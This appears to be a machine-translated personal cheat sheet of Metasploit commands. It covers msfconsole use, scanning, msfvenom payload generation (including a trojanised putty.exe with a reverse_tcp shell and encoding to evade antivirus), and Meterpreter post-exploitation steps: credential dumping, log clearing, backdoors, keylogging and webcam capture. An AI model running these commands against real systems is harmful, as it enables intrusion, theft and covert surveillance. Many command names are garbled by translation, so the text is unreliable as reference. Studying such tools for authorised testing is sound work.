Msfconsolecommand
Back to exit the current module
Banner display an MSF image
Check checks to see if the current target supports the exploits
Show options shows the current exploites option
Connect Remote connection ip+ port
Edit opens the current exploits in vim and then edits
Exit Msfconsole Environment
grep, like grep in Linux, crawls flag,eg:grep http search Oracle from the target
Info Displays the details of the current exploits
IRB enters a ruby interactive shell that dynamically interacts and creates Metasploit scripts
Jobs-h working on the current operation
Kill+jobid to terminate a job with job ID
Load loads some plugins from the Metasploit plug-in library
LoadPath add some third-party plugins to Metasploit through path
Unload Uninstall
Resource loads some of the source code and runs it through Msfconsole, and can also be used to execute some batch scripts
Route Add routing Feature
Search for some modules you want to know or exploit or
Help Search to see search assistance
Search Name: keyword searching by name
Search platform: Narrow the scope of your searches with the platform
Search Type: Narrow the range by type, such as Auxiliary,post,exploit,etc
Search Author: Searching by your favorite author
Search Name:author:platform: Multiple options to narrow the range when searching
Session Management Session-l can make a list
The Session-i ID can connect to the session with the ID and an interactive shell appears
Set is the current module Oh, option and parameters.
unset removing the parameters of its own configuration
SETG/UNSETG setting/Removing global variables, creating a global variable can save you time
Save saves the current configuration and properties
Auxiliary auxiliary Module (scanner,denial of service modules,fuzzers)
Exploits attack module, the core of Metasploit, preserves a variety of vulnerabilities
Payloads payload
In the utilization module, show targets shows which targets are supported
Show advanced Options
Show Nops shows the NOP generator provided by Metasploit
PAYLOADSMSF payloads
Stager establishes a communication channel between the attacker and the victim to read the remote host in a phase payload
Meterpreter through DLL injection operations, completely reside in memory, not on the hard disk left traces so traditional forensics difficult to find
The Passivex can help bypass the restricted outbound firewall. It does this by creating a hidden instance of Internet Explorer by using an ActiveX control. By using the new ActiveX control, it communicates with the attacker through HTTP requests and responses.
Nonx is used to circumvent DEP and has DEP on some CPUs to prevent code from running in some areas of memory
The reflective DLL injection the reflection DLL injection, injecting the phase payload into the in-memory running host process without touching the host hard disk. Both VNC and Meterpreter use a reflective DLL injection
Generating payloads
To generate shellcode without any command, you only need to use generate directly.
Use Generate-b '/x00/' to remove empty characters, effectively reducing the size of shellcode
Meterpreterusing Meterpreter Commands
Background switching between Meterpreter and MSF
Clearev clears the app information and security log from the Windows system. No options and parameters
Download Download remote files, when downloading files under Windows System, note the double slash
Edit opens the file with VI and edits
Execute opens a command line on the destination machine. Execute-f Cmd.exe-i-H
Getuid display of users running on Meterpreter server
Hashdump dumping data for Sam databases
Idletime Display the user's idle time on the remote machine
Lpwd shows the running path of the current Meterpreter
The LCD switches your working directory directly in the Meterpreter, making it possible to directly access the files of the destination path
PS shows the running processes on the target machine
Search searches the target machine for files, searches the entire system, or makes folders that can be used with wildcards
The shell provides a native shell on the target machine
Upload can upload files or folders to the target machine
Webcam_list run from Meterpretershell to display the available webcam on the target machine
Webcam_snap uses the available webcam of the current target machine to JPEG and save.
Execute execute file on target machine
GETWD gets the working directory of the current target machine, and can also get the working directory of the current system.
Download Download from Target machine or file to attack aircraft
Route View Routes
PROTFWD Meterfreter Embedded Port forwarder
PS viewing process through PS
Migrate +pid can migrate Meterpreter sessions from one process to the memory space of another process. So as long as this process does not end, the Meterpreter session will not be closed.
Python_execute
The following statements are all in the Meterpreter environment
Python_execute +python statements to implement Python usage
Python_execute "Import os; Cd=os.getpwd ()"-R CD. Use-R to print the current variable
Python_import-f +path is used to introduce Python files in Meterpreter, using-F to specify the file
Port Scanning
Rhosts can set IP ranges, CIDR ranges and multiple ranges separated by commas, and host list files separated by rows
THREADS the number of concurrent threads for the scanner defaults to 1, but there are specific rules: keep under 16 on the Win32 system, and under 2001 in Cygwin, the class Linux system can THREADS higher than 256
Db_nmap use Nmap Scan and save the scan results in database
Nmap-oa to run the NMAP scan will generate three output files and then populate the database with Db_import
Search Portscan for the Portscanner available in the MSF framework
Auxiliary/scanner/smb/snb_version can be used to detect the operating system version and hostname on the target machine
AUXILIARY/SCANNER/IP/IPIDSEQ Scan the current network of idle hosts, using the idle host to scan other hosts, using the zombie machine to achieve their own stealth purposes
Use the nmap+ parameter + zombie ip+ destination IP in the IPIDSEQ environment to achieve the purpose of using zombies to initiate NMAP scanning
Using Metasploit to findvnlnerable MSSQL systems (Microsoft SQL Server)
Use auxiliary/scanner/mssql/mssql_ping to set parameters and find out if the surviving MSSQL server can use Auxiliary/admin/mssql/mssql_exec for exploit. You can also use tools like Thc-hydra and Medusa for brute force
Service identification
SSH Service found port (22), FTP service port (21)
Extending Psnuffle
All modules are located in Data/exploits/psnuffle, and the name corresponds to the protocol name used by Psnuffle, usually using regular expressions
SNMP sweeping
There is an SNMP auxiliary module in the Metasploit, and the Metasploit has a built-in auxiliary module dedicated to the clear SNMP device. Need to modify snmpdopts= '-lsd-lf/dev/null-u snmp-i-smux-p/var/run/snmpd.pid 127.0.0.1 in/etc/default/snmpd before execution
127.0.0.1 modifies bit 0.0.0.0, because only local SNMP is scanned by default. Then restart the service
When making SNMP queries, there is a MIB API, the MIB is the management information base, which allows querying devices and extracting information, Metasploit the MIB list in the database is loaded by default
Search SNMP to view the available SNMP scan modules
Writing your own security scanner
Subsequent detailed
Msfvenom
Necessary Options-p and-F
-p Specifies that the payload need to follow the parameters lhost= ... lport=. Wait, look at options.
-f Specifies the output format of the payload
-B will automatically call the encoder
-e using the encoding module
-I followed by the number of iterations to encode multiple times, in some cases the iterative coding can be used to circumvent anti-virus software
Msfvenom–help-formats viewing the output formats supported by MSF
Msfvenom-l Payloads List Payloads list
MSFVENOM-L Encoder Listing encoding methods
Msfvenom-l nops empty field module/to bypass and avoid killing
Bounce back to Meterpreter session payload:
Msfvenom-p windows/meterpreter/reverse_tcp lost= own IP lport=444-f exe-o payload.exe
Msfvenom-p windows/meterpreter/reverse_tcp lhost=192.168.1.10 lport=4444-a x86--platform windows-e X86/shikata_ga_ Nai-i 3-x/root/Download/putty.exe-k-F exe-o/root/Desktop/putty_evil.exe
Application of Meterpreter in post-infiltration 0x01 privilege elevation
Getudid gets the current user ID Getsystem
0x02 Domain Admins sniffing
Use Post/windows/gather/enum_domain
0x03 Crawl Password
Load Minikatz
Windows/gather/hashdump
0x04 Log Cleanup
Clearev
0x05 Backdoor
Metsvc
Exploit/multi/hander
Payload windows/metsvc_bind_tcp
Persistence self-initiated installation will leave a backdoor and add the boot entry
0x06 Keylogger
Keyscan_start
Keyscan_dump
Keyscan_stop
0x07 Process Injection 0x08 screenshot
Use Espia
Screen
Screenrab
Some of the commands commonly used by Metasploit come from their own understanding of official documents.